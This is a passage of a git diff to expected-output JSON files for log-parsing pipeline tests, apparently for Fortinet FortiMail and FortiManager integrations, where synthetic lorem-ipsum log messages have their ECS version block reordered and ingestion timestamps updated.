"2021-12-09T13:37:30.096316700Z" + "ingested": "2021-12-14T14:43:09.749046684Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-4-22 time=23:36:32 device_id=itaedict log_id=olorema log_part=rep type=event subtype=update pri=low msg=ptatemse", "event": { - "ingested": "2021-12-09T13:37:30.096322800Z" + "ingested": "2021-12-14T14:43:09.749047077Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-5-7 time=06:39:06 device_id=eleumi log_id=edic log_part=udexerc type=event subtype=pop3 pri=low user=olabori ui=odic action=block status=lica msg=secil", "event": { - "ingested": "2021-12-09T13:37:30.096328800Z" + "ingested": "2021-12-14T14:43:09.749047464Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-5-21 time=13:41:41 device_id=nimadmin log_id=midest log_part=modt type=event subtype=update pri=very-high msg=tocca", "event": { - "ingested": "2021-12-09T13:37:30.096334800Z" + "ingested": "2021-12-14T14:43:09.749047854Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-6-4 time=20:44:15 device_id=usant log_id=mipsumq log_part=ident type=event subtype=config pri=very-high user=sequatD ui=ercitati(10.40.89.185) module=temse submodule=caecat msg=\"cusanti\"", "event": { - "ingested": "2021-12-09T13:37:30.096340900Z" + "ingested": "2021-12-14T14:43:09.749048236Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-6-19 time=03:46:49 device_id=conseq log_id=itame log_part=tenat type=virus subtype=infected pri=very-high from=\"yCiceroi\" to=\"nostrum\" client_name=\"orroquis5179.local\" client_ip=\"10.252.96.71\" session_id=\"tvolu\" msg=\"dutper\"", "event": { - "ingested": "2021-12-09T13:37:30.096347Z" + "ingested": "2021-12-14T14:43:09.749048617Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-7-3 time=10:49:23 device_id=ugiatqu log_id=eruntmo log_part=nimve type=virus subtype=infected pri=very-high from=natus to=boreet client_name=\"luptasnu757.www.home\" client_ip=\"10.174.210.232\" session_id=ovolupta msg=\"volup\"", "event": { - "ingested": "2021-12-09T13:37:30.096355800Z" + "ingested": "2021-12-14T14:43:09.749049004Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-7-17 time=17:51:58 device_id=Bonoru log_id=rcitati log_part=nula type=event subtype=imap pri=medium user=deomni ui=adipi(10.120.232.62) action=block status=ntutl msg=\"volupt\"", "event": { - "ingested": "2021-12-09T13:37:30.096362300Z" + "ingested": "2021-12-14T14:43:09.749049389Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-8-1 time=00:54:32 device_id=mquameiu log_id=loremq log_part=turmagni type=event subtype=imap pri=very-high user=emUtenim ui=ende action=block status=amnis msg=rvelil", "event": { - "ingested": "2021-12-09T13:37:30.096368400Z" + "ingested": "2021-12-14T14:43:09.749049799Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-8-15 time=07:57:06 device_id=rumetMa log_id=mexerci log_part=urEx type=virus subtype=file-signature pri=medium liq to=abore src=10.200.225.45 session_id=dol msg=exe", "event": { - "ingested": "2021-12-09T13:37:30.096374600Z" + "ingested": "2021-12-14T14:43:09.749050249Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-8-29 time=14:59:40 device_id=audant log_id=rspicia log_part=pitl type=statistics pri=high session_id=mmod client_name=taevit4968.mail.local client_ip=10.144.111.42 dst_ip=10.62.61.1 from=lam hfrom=asnu to=com polid=rep domain=mveni5084.internal.local mailer=num resolved=ctetura src_type=quaerat direction=inbound virus=umexer disposition=amnih classifier=tper message_length=pisciv subject=tconsect", "event": { - "ingested": "2021-12-09T13:37:30.096380700Z" + "ingested": "2021-12-14T14:43:09.749050634Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-9-12 time=22:02:15 device_id=emipsumq log_id=culpaq log_part=quamq type=event subtype=pop3 pri=medium user=emvel ui=pta(10.183.213.223) action=block status=hend msg=remagna", "event": { - "ingested": "2021-12-09T13:37:30.096386300Z" + "ingested": "2021-12-14T14:43:09.749051018Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-9-27 time=05:04:49 device_id=lauda log_id=plicaboN log_part=dolo type=virus subtype=file-signature pri=medium from=\"elit\" to=sam src=\"tMal [10.52.190.18]\" session_id=isni msg=quid", "event": { - "ingested": "2021-12-09T13:37:30.096390100Z" + "ingested": "2021-12-14T14:43:09.749051400Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-10-11 time=12:07:23 device_id=inibus log_id=secte log_part=ctobeat type=event subtype=config pri=low user=iqui ui=animide module=pid submodule=itanimi msg=\"onoru\"", "event": { - "ingested": "2021-12-09T13:37:30.096394900Z" + "ingested": "2021-12-14T14:43:09.749051794Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-10-25 time=19:09:57 device_id=naaliq log_id=plica log_part=asiarc type=event subtype=imap pri=low user=seq ui=snula(10.203.110.206) action=deny status=dipi msg=ecatc", "event": { - "ingested": "2021-12-09T13:37:30.096400600Z" + "ingested": "2021-12-14T14:43:09.749052179Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-11-9 time=02:12:32 device_id=dolo log_id=velites log_part=oloremi type=virus_file-signature pri=high apari to=tsunt src=\"caecat [10.108.10.197]\" session_id=enim msg=\"Attachment file (umq) has sha1 hash value: sistena\"", "event": { - "ingested": "2021-12-09T13:37:30.096405800Z" + "ingested": "2021-12-14T14:43:09.749052597Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-11-23 time=09:15:06 device_id=imipsam log_id=eumiu log_part=tatevel type=event subtype=smtp pri=high user=quisnostui=sequines(10.115.154.104) action=cancelstatus=lorumsession_id=\"suntexpl\" msg=\"DSN: to \u003c\u003ciqu\u003e; reason:success; sessionid:tatis\"", "event": { - "ingested": "2021-12-09T13:37:30.096410100Z" + "ingested": "2021-12-14T14:43:09.749052986Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-12-7 time=16:17:40 device_id=econ log_id=aborio log_part=rve type=event subtype=smtp pri=medium user=nbyCiui=runtmollaction=blockstatus=velillumsession_id=\"ionev\" msg=\"to=\u003c\u003cvitaedi\u003e, delay=rna, xdelay=cons, mailer=ipv6-icmp, pri=lupta, relay=olaboris3175.internal.home[10.250.94.95], dsn=tno, stat=imvenia\"", "event": { - "ingested": "2021-12-09T13:37:30.096415Z" + "ingested": "2021-12-14T14:43:09.749053368Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-12-21 time=23:20:14 device_id=atevelit log_id=ugitsed log_part=dminimve type=virus subtype=file-signature pri=very-high from=\"onse\" to=uiac src=tquii [10.164.49.95] session_id=emeumfu msg=\"inBCSedu\"", "event": { - "ingested": "2021-12-09T13:37:30.096421400Z" + "ingested": "2021-12-14T14:43:09.749053869Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-1-5 time=06:22:49 device_id=ddo log_id=emp log_part=inBC type=event subtype=smtp pri=low user=eacommui=aboNem(10.11.45.141) action=allowstatus=remasession_id=\"mcol\"msg=\"STARTTLS=tion, cert-subject=umquia, cert-issuer=lorsita, verifymsg=spici\"", "event": { - "ingested": "2021-12-09T13:37:30.096426Z" + "ingested": "2021-12-14T14:43:09.749054248Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-1-19 time=13:25:23 device_id=odit log_id=vol log_part=epteurs type=statistics pri=very-high session_id=\"cteturad\" client_name=\"modi6930.internal.test[10.60.164.100]\"dst_ip=\"10.161.1.146\" from=\"etconse\" to=\"nproiden\" polid=\"ionem\" domain=\"taevitae6868.www.corp\" subject=\"ehende\" mailer=\"rep\" resolved=\"nostru\" direction=\"internal\" virus=\"ipiscin\" disposition=\"trudexe\" classifier=\"qua\" message_length=modit", "event": { - "ingested": "2021-12-09T13:37:30.096430500Z" + "ingested": "2021-12-14T14:43:09.749054641Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-2-2 time=20:27:57 device_id=orsit log_id=deFinibu log_part=iaecons type=event subtype=admin pri=very-high user=rautod ui=onorumet(10.157.118.41) action=cancel status=chit reason=unknown msg=\"erspici\"", "event": { - "ingested": "2021-12-09T13:37:30.096434300Z" + "ingested": "2021-12-14T14:43:09.749055025Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-2-17 time=03:30:32 device_id=quidol log_id=tinv log_part=Utenima type=statistics pri=high session_id=temqu client_name=uradip7802.mail.example client_ip=10.44.35.57 dst_ip=10.93.239.216 from=vento hfrom=litsed to=ciun polid=rehender domain=tetura7106.www5.corp mailer=eosquir resolved=tqu src_type=emips direction=internal virus=tinvolu disposition=ptat classifier=amquisn message_length=Finibus subject=nsequat", "event": { - "ingested": "2021-12-09T13:37:30.096439100Z" + "ingested": "2021-12-14T14:43:09.749055422Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-3-3 time=10:33:06 device_id=evelite log_id=remquela log_part=toreve type=event subtype=update pri=high msg=\"dolor\"", "event": { - "ingested": "2021-12-09T13:37:30.096445300Z" + "ingested": "2021-12-14T14:43:09.749055809Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-3-17 time=17:35:40 device_id=itse log_id=lapari log_part=Bonor type=event subtype=update pri=medium msg=exeaco", "event": { - "ingested": "2021-12-09T13:37:30.096451500Z" + "ingested": "2021-12-14T14:43:09.749056197Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-4-1 time=00:38:14 device_id=emvele log_id=tNeq log_part=olorsita type=virus_file-signature pri=medium eleumiu to=etdol src=\"imadmin [10.123.154.140]\" session_id=liqu msg=dolor", "event": { - "ingested": "2021-12-09T13:37:30.096457600Z" + "ingested": "2021-12-14T14:43:09.749056586Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-4-15 time=07:40:49 device_id=aliq log_id=utem log_part=oreetd type=event subtype=imap pri=very-high user=mremape ui=ude action=deny status=emac msg=rmagnido", "event": { - "ingested": "2021-12-09T13:37:30.096463600Z" + "ingested": "2021-12-14T14:43:09.749056960Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-4-29 time=14:43:23 device_id=pariatur log_id=cita log_part=tvo type=event subtype=admin pri=high user=rve ui=atemacc(10.141.108.1) action=deny status=ciunt reason=success msg=\"beataevi\"", "event": { - "ingested": "2021-12-09T13:37:30.096469700Z" + "ingested": "2021-12-14T14:43:09.749057341Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-5-13 time=21:45:57 device_id=imaven log_id=dmin log_part=sum type=event subtype=system pri=low user=lore ui=nim action=cancel status=edquiac msg=psamvolu", "event": { - "ingested": "2021-12-09T13:37:30.096475900Z" + "ingested": "2021-12-14T14:43:09.749057726Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-5-28 time=04:48:31 device_id=iade log_id=tae log_part=obe type=event subtype=admin pri=medium user=ulapari ui=rittenby(10.31.31.193) action=deny status=nvol reason=unknown msg=\"luptatem\"", "event": { - "ingested": "2021-12-09T13:37:30.096482Z" + "ingested": "2021-12-14T14:43:09.749058113Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-6-11 time=11:51:06 device_id=conse log_id=ruredolo log_part=ati type=event subtype=system pri=low user=olors ui=roid(10.234.156.8) action=block status=uteiru msg=\"xer\"", "event": { - "ingested": "2021-12-09T13:37:30.096488100Z" + "ingested": "2021-12-14T14:43:09.749058533Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-6-25 time=18:53:40 device_id=nvol log_id=uame log_part=quia type=event subtype=update pri=very-high msg=\"labor\"", "event": { - "ingested": "2021-12-09T13:37:30.096494200Z" + "ingested": "2021-12-14T14:43:09.749058933Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-7-10 time=01:56:14 device_id=mwritte log_id=modit log_part=quamnih type=event subtype=config pri=medium user=itanimid ui=uiin module=nibusBo submodule=iusm msg=\"nostru\"", "event": { - "ingested": "2021-12-09T13:37:30.096500300Z" + "ingested": "2021-12-14T14:43:09.749059317Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-7-24 time=08:58:48 device_id=vel log_id=preh log_part=madmini type=event subtype=update pri=high msg=edutpers", "event": { - "ingested": "2021-12-09T13:37:30.096506400Z" + "ingested": "2021-12-14T14:43:09.749059735Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-8-7 time=16:01:23 device_id=sBonoru log_id=everi log_part=squ type=virus subtype=file-signature pri=medium from=\"utla\" to=nse src=10.160.236.78 session_id=nostrude msg=\"Attachment file (rinc) has sha1 hash value: tno\"", "event": { - "ingested": "2021-12-09T13:37:30.096512600Z" + "ingested": "2021-12-14T14:43:09.749060114Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-8-21 time=23:03:57 device_id=cid log_id=nonproi log_part=dolor type=event subtype=admin pri=medium user=molli ui=oeiusm(10.244.19.62) action=accept status=nnumquam reason=unknown msg=\"tdolore\"", "event": { - "ingested": "2021-12-09T13:37:30.096518700Z" + "ingested": "2021-12-14T14:43:09.749060512Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-9-5 time=06:06:31 device_id=icta log_id=epteu log_part=nvent type=event subtype=webmail pri=high user=mquiavol ui=odiconse(10.147.52.164) action=allow status=untutl msg=ugiatnul", "event": { - "ingested": "2021-12-09T13:37:30.096524900Z" + "ingested": "2021-12-14T14:43:09.749060919Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-9-19 time=13:09:05 device_id=quaturve log_id=elaudant log_part=olup type=spam pri=high session_id=\"iacon\" client_name= \"ncu3839.www.localhost\" client_ip=\"10.201.105.58\" dst_ip=\"10.251.183.113\" from=\"ent\" to=\"ionemu\" subject=\"eseosqu\" msg=\"uptatem\"", "event": { - "ingested": "2021-12-09T13:37:30.096531Z" + "ingested": "2021-12-14T14:43:09.749064018Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-10-3 time=20:11:40 device_id=eprehen log_id=oinB log_part=lor type=statistics pri=low session_id=\"citatio\" client_name=\"[10.209.203.156]\"dst_ip=\"10.132.139.98\" from=\"pariat\" to=\"borisnis\" direction=\"unknown\" virus=\"oremagn\" disposition=\"emagna\" classifier=\"uidolor\" message_length=remag", "event": { - "ingested": "2021-12-09T13:37:30.096535600Z" + "ingested": "2021-12-14T14:43:09.749064436Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-10-18 time=03:14:14 device_id=tiumtot log_id=ulamcola log_part=epr type=event subtype=admin pri=low user=nculpa ui=enbyCice(10.152.196.145) action=block status=uptas reason=success msg=\"iadeseru\"", "event": { - "ingested": "2021-12-09T13:37:30.096540500Z" + "ingested": "2021-12-14T14:43:09.749064831Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-11-1 time=10:16:48 device_id=equ log_id=turadip log_part=ataev type=virus_file-signature pri=medium from=\"oree\" to=\"nimadmi\" src=\"utaliq [10.78.38.143]\" session_id=qui msg=\"Attachment file (epteurs) has sha1 hash value: did\"", "event": { - "ingested": "2021-12-09T13:37:30.096546200Z" + "ingested": "2021-12-14T14:43:09.749065215Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-11-15 time=17:19:22 device_id=sunt log_id=orumSe log_part=olupta type=event subtype=update pri=very-high msg=pta", "event": { - "ingested": "2021-12-09T13:37:30.096551500Z" + "ingested": "2021-12-14T14:43:09.749065598Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-11-30 time=00:21:57 device_id=ntutlabo log_id=leumiure log_part=tasnu type=event subtype=smtp pri=high user=amquaui=tionevol(10.209.124.81) action=allowstatus=tobesession_id=\"ssequa\" log_part=emp msg=\"to=\u003c\u003cemoeni, delay=officiad, xdelay=veniam, mailer=igmp, pri=entoreve, relay=ion3339.www.localdomain\"", "event": { - "ingested": "2021-12-09T13:37:30.096555800Z" + "ingested": "2021-12-14T14:43:09.749065982Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-12-14 time=07:24:31 device_id=int log_id=oremagn log_part=rnatur type=virus pri=medium from=uptatev to=\"oditem\" src=\"10.176.31.145\" session_id=\"ineavo\" msg=reseo", "event": { - "ingested": "2021-12-09T13:37:30.096560800Z" + "ingested": "2021-12-14T14:43:09.749066375Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/fortinet/data_stream/fortimanager/_dev/test/pipeline/test-generated.log-expected.json b/packages/fortinet/data_stream/fortimanager/_dev/test/pipeline/test-generated.log-expected.json index a326353e5c5..f6cba0e0da4 100644 --- a/packages/fortinet/data_stream/fortimanager/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/fortinet/data_stream/fortimanager/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "logver=iusm devname=\"modtempo\" devid=\"olab\" vd=nto date=2016-1-29 time=6:09:59 logid=sse type=exercita subtype=der level=very-high eventtime=odoco logtime=ria srcip=10.20.234.169 srcport=1001 srcintf=eth5722 srcintfrole=vol dstip=10.44.173.44 dstport=6125 dstintf=enp0s3068 dstintfrole=nseq poluuid=itinvol sessionid=psa proto=21 action=allow policyid=ntium policytype=psaq crscore=13.800000 craction=eab crlevel=aliqu appcat=Ute service=lupt srccountry=dolore dstcountry=sequa trandisp=abo tranip=10.189.58.145 tranport=5273 duration=14.119000 sentbyte=7880 rcvdbyte=449 sentpkt=mqui app=nci", "event": { - "ingested": "2021-12-09T13:37:31.906792100Z" + "ingested": "2021-12-14T14:43:11.779383324Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-2-12 time=1:12:33 logver=litesse devid=orev devname=pisciv logid=uii type=umexe subtype=estlabo level=high vd=iatnu srcip=10.182.84.248 srcport=4880 srcintf=enp0s208 dstip=10.162.33.193 dstport=7200 dstintf=enp0s2581 poluuid=nulapari sessionid=mwritten proto=prm action=accept policyid=uidolor trandisp=nibus duration=72.226000 sentbyte=6378 rcvdbyte=3879 devtype=riosam osname=anonnu osversion=1.410 mastersrcmac=ameaqu srcmac=01:00:5e:84:66:6c crscore=145.047000 craction=squame crlevel=ntex eventtype=eius user=luptat service=emape hostname=aer445.host profile=eumiu reqtype=uame url=https://www.example.net/orisn/cca.htm?ofdeF=metcons#roinBCS direction=external msg=com method=eataevi cat=byC catdesc=tinculp device_id=tur log_id=atio pri=high userfrom=atemsequ adminprof=nci timezone=CEST main_type=eFini trigger_policy=amco sub_type=exe severity_level=iatu policy=ionofde src=10.62.4.246 src_port=189 dst=10.171.204.166 dst_port=6668 http_method=mol http_url=taspe http_host=mvolu http_agent=radip http_session_id=tNequ signature_subclass=gelit signature_id=6728 srccountry=tconsec content_switch_name=nsequat server_pool_name=taev false_positive_mitigation=roidents user_name=oluptas monitor_status=llu http_refer=https://api.example.org/tamremap/tur.html?radipis=isetq#estqui http_version=uasiarch dev_id=emaper threat_weight=ssitasp history_threat_weight=eum threat_level=sum ftp_mode=uaerat ftp_cmd=boreet cipher_suite=onev msg_id=tenima", "event": { - "ingested": "2021-12-09T13:37:31.906800400Z" + "ingested": "2021-12-14T14:43:11.779386908Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=seq dtime=2016-02-26 20:15:08.252538723 +0000 UTC devid=olorema devname=ccaecat vd=veleumi date=2016-2-26 time=8:15:08 logid=tia type=enim subtype=dqu level=medium eventtime=uian logtime=tempo srcip=10.200.188.142 srcport=4665 srcintf=eth4496 srcintfrole=eetd dstip=10.94.103.117 dstport=513 dstintf=enp0s3491 dstintfrole=doloreeu poluuid=pori sessionid=occ proto=icmp action=allow policyid=reetdolo policytype=nrepreh crscore=18.839000 craction=uiano crlevel=mrema appcat=autfu service=natura srccountry=aboris dstcountry=ima trandisp=tanimi tranip=10.15.159.80 tranport=6378 duration=121.916000 sentbyte=6517 rcvdbyte=13 sentpkt=ugiatqu app=eacomm", "event": { - "ingested": "2021-12-09T13:37:31.906804Z" + "ingested": "2021-12-14T14:43:11.779387380Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=liqu devname=\"lorem\" devid=\"emq\" vd=isiu date=2016-3-12 time=3:17:42 logid=nimadmi type=iatisu subtype=iat level=low eventtime=suntinc logtime=elits srcip=10.131.233.27 srcport=5037 srcintf=eth3676 srcintfrole=eataevit dstip=10.50.112.141 dstport=7303 dstintf=eth3391 dstintfrole=olab poluuid=mquisnos sessionid=loremagn proto=1 action=cancel policyid=tsed policytype=orai crscore=61.614000 craction=incididu crlevel=eci appcat=aali service=ametcons srccountry=porainc dstcountry=amquisno trandisp=iinea tranip=10.27.88.95 tranport=776 duration=5.911000 sentbyte=1147 rcvdbyte=3269 sentpkt=tvol app=moll", "event": { - "ingested": "2021-12-09T13:37:31.906808800Z" + "ingested": "2021-12-14T14:43:11.779387763Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-3-26 time=10:20:16 logver=inim devid=ema devname=roinBCSe logid=onse type=tae subtype=tatno level=very-high vd=oluptate srcip=10.52.54.178 srcport=4427 srcintf=lo1567 dstip=10.37.58.155 dstport=2430 dstintf=eth6096 poluuid=ciati sessionid=ercit proto=3 action=allow policyid=eniam trandisp=reetdolo duration=165.411000 sentbyte=7651 rcvdbyte=3982 devtype=rumet osname=oll osversion=1.5670 mastersrcmac=nido srcmac=01:00:5e:c3:0a:41 crscore=71.955000 craction=itlabori crlevel=Ciceroi eventtype=aveniam user=uradi service=nimadmin hostname=olo7148.mail.home profile=snulapar reqtype=aedic url=https://api.example.com/iumto/aboreetd.gif?dun=enim#saute direction=internal msg=eriame method=lorema cat=avol catdesc=labor device_id=atuse log_id=ddoeiu pri=high userfrom=idolore adminprof=onse timezone=PST main_type=tation trigger_policy=ips sub_type=emeumfug severity_level=upta policy=omn src=10.87.212.179 src_port=1758 dst=10.157.213.15 dst_port=3539 http_method=ali http_url=nsect http_host=ntutl http_agent=caecatc http_session_id=onsequat signature_subclass=siuta signature_id=2896 srccountry=loru content_switch_name=ema server_pool_name=par false_positive_mitigation=itaut user_name=rveli monitor_status=rsint http_refer=https://example.com/idestla/Nemoeni.htm?taed=lup#remeumf http_version=antiumto dev_id=strude threat_weight=ctetura history_threat_weight=usmod threat_level=edqui ftp_mode=mquidol ftp_cmd=ita cipher_suite=ipi msg_id=rsitamet", "event": { - "ingested": "2021-12-09T13:37:31.906814500Z" + "ingested": "2021-12-14T14:43:11.779388223Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-4-9 time=5:22:51 logver=eseru devid=remeum devname=orain logid=quip type=oin subtype=uisquam level=high vd=tinvol srcip=10.19.68.92 srcport=1409 srcintf=enp0s33 dstip=10.38.22.45 dstport=7036 dstintf=lo1120 poluuid=ditautfu sessionid=piscing proto=icmp action=accept policyid=ostr trandisp=rudexerc duration=135.013000 sentbyte=3369 rcvdbyte=927 devtype=itaut osname=imaven osversion=1.152 mastersrcmac=umdolo srcmac=01:00:5e:f7:4a:fd crscore=169.252000 craction=tfug crlevel=icab eventtype=mwr user=fugi service=inculpaq hostname=agna7678.internal.host profile=equa reqtype=mexercit url=https://www.example.net/tasuntex/sunt.txt?ume=incidi#picia direction=unknown msg=olupt method=dit cat=sumquiad catdesc=dexeaco device_id=ivelits log_id=moenimi pri=medium userfrom=etdolo adminprof=inv timezone=CEST main_type=ommod trigger_policy=sequatur sub_type=uidolo severity_level=lumquido policy=nihi src=10.114.150.67 src_port=1407 dst=10.76.73.140 dst_port=3075 http_method=uines http_url=nsec http_host=onse http_agent=emips http_session_id=imadmi signature_subclass=ostrume signature_id=6051 srccountry=eataev content_switch_name=liquide server_pool_name=uasia false_positive_mitigation=emp user_name=aperia monitor_status=ofdeFini http_refer=https://example.org/vol/riat.htm?atvol=umiur#imad http_version=msequi dev_id=isnostru threat_weight=iquaUten history_threat_weight=santium threat_level=iciatisu ftp_mode=rehender ftp_cmd=eporroqu cipher_suite=uat msg_id=tem", "event": { - "ingested": "2021-12-09T13:37:31.906819100Z" + "ingested": "2021-12-14T14:43:11.779388719Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=suntinc date=2016-4-24 time=12:25:25 log_id=xeac devid=nidolo devname=tatn logid=eli type=nnu subtype=dolo level=low vd=nse srcip=10.202.204.239 srcport=7783 srcintf=lo2857 dstip=10.147.28.176 dstport=7432 dstintf=enp0s1462 poluuid=mporain sessionid=icons proto=0 action=accept policyid=sequi trandisp=rehend duration=3.138000 sentbyte=6354 rcvdbyte=3605 devtype=numqu osname=qui osversion=1.4059 mastersrcmac=equi srcmac=01:00:5e:68:86:a1 crscore=72.701000 craction=tat crlevel=ipitla eventtype=quae user=maccusa service=uptat hostname=equep5085.mail.domain profile=aqu reqtype=rpo url=https://www.example.org/inesci/serror.html?mqu=apariat#tlabore direction=internal msg=ihilm method=atDu cat=eav catdesc=ionevo device_id=remagn log_id=run pri=very-high userfrom=iamquis adminprof=quirat timezone=CET main_type=ittenbyC trigger_policy=isc sub_type=aturve severity_level=emulla policy=mpori src=10.195.36.51 src_port=3905 dst=10.95.64.124 dst_port=7042 http_method=iadese http_url=nsectet http_host=utla http_agent=utei http_session_id=laborum signature_subclass=tionof signature_id=7613 srccountry=oin content_switch_name=lapari server_pool_name=data false_positive_mitigation=dolor user_name=nnum monitor_status=eritqu http_refer=https://internal.example.net/wri/bor.jpg?hitect=dol#leumiu http_version=namali dev_id=taevit threat_weight=rinrepre history_threat_weight=etconse threat_level=tincu ftp_mode=ari ftp_cmd=exercit cipher_suite=sci msg_id=quamnih", "event": { - "ingested": "2021-12-09T13:37:31.906823100Z" + "ingested": "2021-12-14T14:43:11.779389116Z" + }, + "ecs": { + "version": 